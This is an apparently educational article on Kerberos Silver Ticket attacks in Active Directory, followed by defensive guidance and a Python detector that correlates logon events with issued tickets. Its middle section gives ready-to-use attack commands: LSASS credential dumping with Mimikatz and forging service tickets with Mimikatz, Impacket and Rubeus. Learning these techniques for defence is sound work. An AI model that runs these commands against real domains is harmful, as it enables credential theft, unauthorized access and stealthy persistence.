Introduction
A Silver Ticket attack is a stealthy Kerberos exploitation technique that allows attackers to access specific network services in an Active Directory environment by forging service tickets. Unlike Golden Tickets, which provide domain-wide access by compromising the KRBTGT account, Silver Tickets exploit individual service account credentials to impersonate authorized users for targeted resources. These attacks bypass the domain controller’s scrutiny entirely, as the forged service tickets are validated directly by the target service without any communication with the Key Distribution Center (KDC), making them exceptionally difficult to detect. The sophistication of Silver Ticket attacks lies in their stealth characteristics. Once an attacker obtains the NTLM hash of a service account—such as those running SQL Server, file shares (CIFS), or web applications—they can forge Ticket Granting Service (TGS) tickets offline and present them directly to the target service. This means the attack occurs below the radar of traditional domain controller monitoring, as there are no corresponding Ticket Granting Ticket (TGT) requests or authentication events logged on the domain controller. Organizations that rely primarily on domain controller event logs for security monitoring may completely miss these attacks.
Silver Ticket attacks are particularly dangerous in enterprise environments because they enable persistent access to critical services such as databases, file servers, and application platforms. Attackers can maintain this access for extended periods—until the compromised service account password is changed—allowing them to exfiltrate sensitive data, escalate privileges, or establish persistent footholds within the network. Research indicates that more than 60% of lateral movement campaigns leverage some form of Kerberos ticket exploitation, with Silver Tickets being a preferred method for skilled adversaries due to their stealthy nature. The challenge is compounded by the fact that traditional containment methods, such as resetting the KRBTGT password (which invalidates Golden Tickets), have no effect on Silver Tickets, potentially creating a false sense of security for incident responders.
Learning Objectives
- Understand the concept and mechanics of Silver Ticket attacks in Active Directory.
- Recognize the steps involved in conducting a Silver Ticket attack.
- Explore practical techniques and tools used by adversaries.
- Identify robust defense strategies and detection methods to protect your organization from this threat.
What is a Silver Ticket Attack
A Silver Ticket is a forged Kerberos Ticket Granting Service (TGS) ticket that grants access to a specific service within an Active Directory domain. By compromising the NTLM hash of a service account, attackers create a fake service ticket, which is trusted by the targeted service but never validated by the domain controller (KDC). This enables the attacker to impersonate users and gain unauthorized access to shared resources like databases, file servers, or application services with the privileges of the compromised service account. The fundamental difference between Silver Tickets and other Kerberos attacks lies in their scope and operation—while Golden Ticket attacks target the KRBTGT account to forge Ticket Granting Tickets (TGTs) that provide domain-wide access, Silver Tickets specifically target individual service accounts to forge service tickets for particular resources. The technical mechanism behind Silver Ticket attacks exploits how Kerberos service authentication works. In normal Kerberos authentication, when a user wants to access a service, they present their TGT to the KDC, which issues a TGS encrypted with the service account’s password hash. This TGS contains a Privilege Attribute Certificate (PAC) that includes the user’s identity, group memberships, and authorization data. When an attacker obtains the NTLM hash of a service account through techniques like credential dumping, Kerberoasting, or extracting it from the local SAM database, they can forge their own TGS tickets offline and craft a custom PAC with arbitrary permissions, often granting themselves elevated rights.
What makes Silver Tickets particularly insidious is their stealth profile. Unlike Golden Tickets, which require interaction with the KDC and generate logs on domain controllers, Silver Tickets bypass the KDC entirely—all authentication events occur only on the target service itself, making detection significantly more challenging. Services commonly targeted include CIFS for file shares, HTTP/HTTPS for web applications, MSSQL for databases, and HOST for remote management. The forged tickets can remain valid until the service account password is changed, which in many organizations may be months or even years, enabling sophisticated adversaries to maintain persistent, stealthy access to critical infrastructure.

How Silver Ticket Attacks Work
Silver Ticket attacks exploit weaknesses in how Kerberos service tickets are validated in Active Directory environments, leveraging the fact that most services do not confirm the authenticity of received tickets with a domain controller. This flaw enables attackers who have compromised a service account’s NTLM hash to forge legitimate-looking Ticket Granting Service (TGS) tickets offline. Since these tickets are accepted by the targeted service without contacting the Key Distribution Center (KDC), adversaries can quietly gain and maintain access to valuable resources. These steps, often executed using widely available tools, allow attackers to perform actions with the same privileges as the compromised service account—often for long periods without detection.
- Account Compromise: The attack typically begins when adversaries gain access to the NTLM hash of a service or computer account. Common techniques include credential dumping tools that extract hashes directly from memory (e.g., LSASS), or Kerberoasting attacks that brute-force weakly protected service account passwords by requesting their Kerberos Service Tickets from the KDC and cracking them offline. The choice of target often revolves around privileged or rarely-changed service accounts, making them ideal for persistent access.
- Information Gathering: After acquiring the service account hash, the attacker gathers crucial domain metadata necessary for ticket forging. This generally includes the domain SID (Security Identifier), the fully qualified domain name (FQDN), and the specific Service Principal Name (SPN) details that uniquely identify the target service within Active Directory. Tools like PowerView or built-in Windows queries make it easy for attackers to enumerate this information and plan their next moves.
- Ticket Forging: Equipped with the necessary data, the attacker then uses tools such as Mimikatz, Impacket, or Rubeus to craft a forged TGS ticket. This forged ticket contains a custom Privilege Attribute Certificate (PAC) that designates arbitrary user privileges and can mimic legitimate users or assign elevated group memberships. The ticket is cryptographically signed using the compromised service account’s NTLM hash, ensuring that the target service will accept it as authentic—even if the permissions are excessive or the ticket validity is abnormally long.
- Lateral Movement and Persistence: With the forged ticket in hand, the adversary presents it to the intended service—such as MSSQL databases, file servers using CIFS, or enterprise web applications. Unlike Golden Ticket attacks (which involve the KDC), this stage occurs entirely at the service level, so the domain controller is never consulted for ticket validation. This makes the attack remarkably stealthy and difficult to detect using traditional domain controller-centric monitoring techniques. Attackers utilize the permissions of the service account to execute commands, access sensitive information, or establish additional footholds for future operations.
- Privilege Escalation: Once inside the target service, an attacker can further exploit their access. Depending on the permissions assigned to the service account and the crafted PAC, adversaries may execute code, create new privileged accounts, exfiltrate critical data, or move laterally to other systems within the network. The persistence of a Silver Ticket attack often lasts until the service account password is rotated—a process that is frequently neglected for service and machine accounts in many organizations.
By taking advantage of underlying protocol weaknesses and incomplete validation on the service end, Silver Ticket attacks allow attackers to operate under the radar of many conventional detection mechanisms—posing a significant risk to organizations that rely on Active Directory.
Attack with Practical Implementation
Understanding Silver Ticket attacks requires familiarity with the tools and techniques adversaries use to forge service tickets. This section explores the practical implementation of Silver Ticket attacks using three primary tools: Mimikatz, Impacket, and Rubeus. Each tool offers unique capabilities and approaches to forging Kerberos service tickets, making them essential components in both offensive security assessments and defensive research.
Mimikatz: The Classic Approach
Mimikatz remains the most widely recognized tool for Kerberos ticket manipulation and Silver Ticket attacks. The workflow begins with compromising a service or computer account to extract its NTLM hash.
Step 1: Extract Service Account Credentials
First, enable debug privileges and dump the NTLM hash from LSASS memory on the target system:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
This command reveals the NTLM hash of the computer or service account (e.g., FileServer1$ or sqlsvc), which is essential for forging the ticket.
Step 2: Gather Required Information
Before forging the ticket, collect the following information:
- Domain SID: Obtain by running whoami /user and removing the RID (last segment) from the output
- Target FQDN: The fully qualified domain name of the target service
- Service Principal Name (SPN): The specific service type (e.g., CIFS, MSSQLSvc, HTTP)
- Username: Can be any username, including fake accounts that don’t exist in AD (prior to November 2021 updates)
Step 3: Forge the Silver Ticket
Create the forged service ticket using the following Mimikatz command:
mimikatz # kerberos::golden /user:administrator /id:500 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:server.lab.adsecurity.org /service:cifs /rc4:d7e2b80507ea074ad59f152a1ba20458 /ptt
Parameter breakdown:
- /user: Username to impersonate (can be fictitious)
- /id: User ID (500 is the default Administrator RID)
- /domain: Target domain FQDN
- /sid: Domain SID
- /target: Target server FQDN
- /service: Service type (CIFS, MSSQLSvc, HTTP, HOST, etc.)
- /rc4: NTLM hash of the service account
- /ptt: Pass-the-Ticket, automatically injecting the ticket into memory
Step 4: Access the Target Service
Once the ticket is injected, you can access the service directly:
dir \\server.lab.denizhalil.com\c$
The forged ticket grants access without any interaction with the domain controller.
Impacket: Cross-Platform Flexibility
Impacket’s ticketer.py script provides a Linux-based alternative for Silver Ticket attacks, offering cross-platform capabilities and scriptable automation.
Step 1: Obtain Domain SID
Use lookupsid.py or getPac.py to retrieve the domain SID:
impacket-getPac -targetUser administrator domain.local/user:password
This outputs the Domain SID, which is required for ticket forging.
Step 2: Generate the Silver Ticket
Forge the service ticket using the collected information:
impacket-ticketer -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 -spn cifs/fileserver.test.local administrator
Alternative with AES key (more stealthy):
impacket-ticketer -aesKey <AES256_KEY> -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -spn host/target.test.local username
Using AES encryption instead of RC4 makes the attack more difficult to detect, as modern environments favor AES for Kerberos encryption.
Step 3: Export and Use the Ticket
Export the generated ticket to the environment and use it for authentication:
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@fileserver.denizhalil.local -k -no-pass
The -k flag instructs the tool to use Kerberos authentication, and -no-pass indicates that no password is needed since the ticket is already cached.
Rubeus: Advanced Windows-Based Manipulation
Rubeus is a powerful C# toolkit designed for advanced Kerberos ticket manipulation on Windows systems. It offers sophisticated features including Diamond Ticket attacks (a refinement of Silver Tickets) and flexible execution methods.
Step 1: Hash Generation
If you have plaintext credentials, generate the hash using Rubeus:
Rubeus.exe hash /user:sqlsvc /domain:domain.local /password:Password123
This outputs RC4, AES128, and AES256 hashes that can be used for ticket forging.
Step 2: Forge the Silver Ticket
Create a Silver Ticket using Rubeus’ golden ticket function (despite the name, it can forge both TGT and TGS):
Rubeus.exe golden /rc4:<NTLM_HASH> /user:administrator /id:500 /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.domain.local /service:cifs /ptt
Step 3: Advanced Diamond Ticket Technique
Rubeus now supports Diamond Ticket attacks for service tickets, which use legitimate TGTs to forge more convincing service tickets:
Rubeus.exe diamond /ticket:<BASE64_TGT> /servicekey:<AES256_SERVICE_KEY> /service:cifs/server.domain.local /enctype:aes256 /domain:domain.local /dc:dc.domain.local /ticketuser:targetuser /nowrap /ptt
Diamond Tickets are significantly stealthier than traditional Silver Tickets because they retain characteristics of legitimate tickets, making detection more difficult.

How to Protect Against Silver Ticket Attacks
Defending against Silver Ticket attacks requires a comprehensive, multi-layered security strategy that addresses both prevention and detection. Since these attacks exploit service account credentials and bypass domain controller validation, organizations must focus on hardening service accounts, implementing robust monitoring systems, and maintaining strict access controls. The following measures represent industry best practices for mitigating Silver Ticket attack risks.
- 1. Service Account Hardening and Management: Implement strong password policies with 15+ character complexity and enforce rotation every 90 days. Deploy Managed Service Accounts (MSAs) or Group Managed Service Accounts (gMSAs) for automatic password rotation. Apply the Principle of Least Privilege by regularly auditing and removing unnecessary permissions. Use Privileged Access Management (PAM) solutions for centralized credential storage, automated rotations, and detailed audit trails.
- 2. Kerberos Delegation Controls: Eliminate unconstrained delegation completely from your environment. Transition to constrained delegation to limit service account permissions to specific services. Implement resource-based constrained delegation (RBCD) for more granular control. Audit delegation configurations regularly using tools like BloodHound or PowerView.
- 3. Advanced Monitoring and Detection: Monitor Windows Event Logs for Event IDs 4624, 4627, 4769, and 4672 to detect anomalous authentication patterns. Deploy SIEM solutions to identify TGS usage without corresponding TGT requests to the KDC. Implement User and Entity Behavior Analytics (UEBA) to detect deviations from normal service account behavior. Configure real-time alerting for unusual access patterns, multiple continuous accesses, and data accumulation indicating exfiltration.
- 4. System Hardening and Patch Management: Keep all systems updated with the latest security patches, prioritizing domain controllers. Harden domain controllers by restricting access, implementing BitLocker encryption, and deploying TPM chips. Implement credential protection with Credential Guard, LSA Protection, and LAPS to prevent unauthorized access and lateral movement.
- 5. Authentication and Access Controls: Enforce Multi-Factor Authentication (MFA) for all privileged accounts and service account operations. Deploy application allow-listing to prevent unauthorized tools from executing. Use Secure Administrative Workstations (SAWs) or Privileged Access Workstations (PAWs) for all privileged operations. Enable Kerberos pre-authentication and PAC validation to strengthen authentication mechanisms.
- 6. Security Awareness and Incident Response: Train security teams regularly on Silver Ticket detection and response procedures. Develop comprehensive incident response playbooks with specific steps for isolation, credential resets, and forensic investigation. Conduct regular penetration testing targeting service accounts and Kerberos authentication. Implement continuous improvement by analyzing detected attacks and refining security controls.
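The correlation described in item 3, a Kerberos logon recorded on the service host (Event ID 4624) with no service ticket issued for it on the domain controller (Event ID 4769), can be implemented as follows. This is an added example, not code from the original article; it assumes events exported as dicts with the native Windows field names, the default 10-hour service ticket lifetime, and a hypothetical SERVICE_ACCOUNTS inventory, and the sample events are constructed.

```python
from datetime import datetime, timedelta

# Assumptions (not from the article): events are exported as dicts with the
# native Windows field names; service tickets live the default 10 hours.
TICKET_LIFETIME = timedelta(hours=10)
CLOCK_SKEW = timedelta(minutes=5)
# Hypothetical inventory: accounts whose keys protect services on each host.
SERVICE_ACCOUNTS = {"fileserver1": {"fileserver1$"}, "sql01": {"sql01$", "sqlsvc"}}


def index_issued_tickets(dc_events):
    """Map (user, service account) -> issue times of successful 4769 events."""
    issued = {}
    for ev in dc_events:
        if ev["EventID"] == 4769 and ev.get("Status") == "0x0":
            # 4769 logs "user@REALM"; 4624 logs the bare account name.
            user = ev["TargetUserName"].split("@", 1)[0].lower()
            issued.setdefault((user, ev["ServiceName"].lower()), []).append(
                datetime.fromisoformat(ev["TimeCreated"]))
    return issued


def find_unbacked_logons(host_events, dc_events):
    """Return Kerberos network logons with no KDC-issued ticket behind them."""
    issued = index_issued_tickets(dc_events)
    findings = []
    for ev in host_events:
        if (ev["EventID"] != 4624 or ev.get("LogonType") != 3
                or ev.get("AuthenticationPackageName") != "Kerberos"):
            continue
        host = ev["Computer"].split(".", 1)[0].lower()
        user = ev["TargetUserName"].lower()
        logon = datetime.fromisoformat(ev["TimeCreated"])
        earliest = logon - TICKET_LIFETIME - CLOCK_SKEW
        backed = any(
            earliest <= issued_at <= logon + CLOCK_SKEW
            for account in SERVICE_ACCOUNTS.get(host, ())
            for issued_at in issued.get((user, account), ())
        )
        if not backed:
            findings.append((ev["TimeCreated"], host, user, ev.get("IpAddress")))
    return findings


# Constructed sample events (not real telemetry).
DC_EVENTS = [
    {"EventID": 4769, "Status": "0x0", "TimeCreated": t, "TargetUserName": u, "ServiceName": s}
    for t, u, s in [("2025-03-04T09:00:00", "alice@LAB.EXAMPLE", "FILESERVER1$"),
                    ("2025-03-04T08:00:00", "bob@LAB.EXAMPLE", "sqlsvc")]
]
HOST_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "TimeCreated": t, "Computer": c,
     "TargetUserName": u, "AuthenticationPackageName": p, "IpAddress": ip}
    for t, c, u, p, ip in [
        ("2025-03-04T09:01:10", "FILESERVER1.lab.example", "alice", "Kerberos", "10.0.0.21"),
        ("2025-03-04T11:30:00", "FILESERVER1.lab.example", "administrator", "Kerberos", "10.0.0.66"),
        ("2025-03-04T20:00:00", "SQL01.lab.example", "bob", "Kerberos", "10.0.0.22"),
        ("2025-03-04T11:31:00", "FILESERVER1.lab.example", "carol", "NTLM", "10.0.0.23"),
    ]
]

if __name__ == "__main__":
    for finding in find_unbacked_logons(HOST_EVENTS, DC_EVENTS):
        print("Kerberos logon without matching 4769:", finding)
```

An unmatched logon is a lead to investigate rather than proof of forgery: gaps in domain controller log collection or tickets issued by a trusted domain's KDC produce the same result.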
Conclusion
Silver Ticket attacks represent a significant and evolving threat to any Active Directory-based environment. By leveraging the NTLM hash of a service account, attackers can forge valid Kerberos service tickets, access sensitive enterprise resources, and evade many traditional detection mechanisms designed to monitor domain controller activity. The stealthy nature of these attacks—bypassing the Key Distribution Center entirely and generating minimal network traffic—makes them particularly attractive to sophisticated adversaries who prioritize persistence over immediate domain-wide access. As organizations increasingly rely on Active Directory for identity management, the attack surface continues to expand, and Silver Ticket attacks remain a preferred technique for lateral movement and privilege escalation in targeted intrusion campaigns. The persistence of Silver Ticket attacks in modern threat landscapes reflects broader trends in adversary tactics. Research indicates that Active Directory has remained a primary attack vector in nearly every major ransomware campaign, with attackers leveraging Kerberos exploitation techniques including Silver Tickets to maintain stealthy, long-term access to critical infrastructure. The Change Healthcare breach of 2024, orchestrated by the ALPHV ransomware group and documented as the most expensive breach to date, exemplified how Active Directory compromises enable catastrophic outcomes. Despite Microsoft’s ongoing efforts to reduce the Active Directory attack surface—including encrypting LDAP by default, adding encryption controls to SMBv3, and introducing features to deprecate NTLM—adversaries have adapted their techniques, increasingly using automation, AI-driven reconnaissance, and living-off-the-land tactics to avoid detection.
The best defense against Silver Ticket attacks combines multiple layers of protection: rigorous service account hygiene with automated password rotation, careful Kerberos delegation management that eliminates unconstrained delegation, extensive monitoring with advanced behavioral analytics, modern endpoint protections including Credential Guard and LSA Protection, and specialized security awareness training for IT and security teams. Organizations must also conduct regular Active Directory security assessments to identify misconfigurations, excessive privileges, and attack paths that adversaries could exploit. Tools like Microsoft Defender for Identity provide proactive security posture assessments that detect common misconfigurations in Active Directory and recommend remediation actions, helping organizations maintain visibility into their identity infrastructure. Understanding the technical mechanics, attack vectors, and defensive strategies for Silver Ticket attacks empowers organizations to build resilient defenses and reduce risk from sophisticated adversaries. As the threat landscape continues to evolve in 2025 and beyond, with attackers increasingly targeting the connections between on-premises Active Directory and cloud environments through hybrid attack vectors, maintaining a robust Active Directory security posture becomes not just a technical requirement but a critical business imperative. Organizations that invest in comprehensive Active Directory hardening, implement continuous monitoring and detection capabilities, and foster a security-aware culture will be best positioned to detect and respond to Silver Ticket attacks before they can cause significant damage to critical business operations and data assets.